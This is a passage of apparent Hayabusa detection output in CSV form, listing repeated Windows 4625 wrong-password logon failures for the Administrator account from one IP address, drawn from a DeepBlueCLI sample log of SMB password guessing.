Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.076 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.658 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXC3hYI1Gin59gvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hQiozAIr9Jgklmks | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O598IvZRpbdU1liO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xlmYWrAnn3sUNSRk | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aAAkO0uOGIq8zVM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 26K4BIpgUbBNWbDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moW3Ts7edqoQ9XeU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8C4d3xE0QkWywbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1EgYFhtgrcjtcXM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.116 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7avpgQeA0KCIme9Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFgmt3OEw4cDfPhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OqITdE5K63nJg9tg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBs4fYCiprxgDd43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtBD0Q2szeURxMYA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KPUi2NhPP92Rs3hy | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2PrbMf9E0fOuwIB8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 807zsxQ9WETO9YIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGMJKRYUlmijJV40 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv33to031A0fQzX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IT0bzycur7HXFeLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.793 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyY2K7tT0HgQ1ZL3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6aexuFPH6FyEZ1bN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o8Iojas6sznqlYUE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U2SnliYkmx59ACSM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2plWY1GZHilHv5Vh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIfmqihMJdPVz80p | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Odg692Eyde8md0t7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gsQNvf5HkRQnbDul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: il2DGq3bzfwGuJN4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9OsQFOcIyougrx0E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gR8wpQrGYzd4NrBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.282 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KFjRsjWXbEPs9m1I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wbjudOy3rWefzAIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Q4gc8keCTv2HeE3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SmsaxHrHYuofUhAH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CvhWasTJYmChfsNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DszGfEo9aua2y5UC | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lZPScjxczbrcJuvJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucpjxJV4rBXOxy4e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BmTtDfX05VsKFrON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhWSUkQhv089RSfJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8RXCiXQYgjuPO78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.773 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfB3u3Np38FOw6hc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I9GcSmto4jdCIw6H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HsogJdHUcldt7JeH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IUbkohKtCy6joOBY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9ZFyYxBrKnz652Co | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQ2MHr71xALFHJqN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgjHOgEYRLQiJX75 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXLjSNCeDAaX4ttQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np6hwdqnWLJawVn9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: adqqChrYx3lZ0BAa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1GTXkOnNYTws1MiC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:21.266 
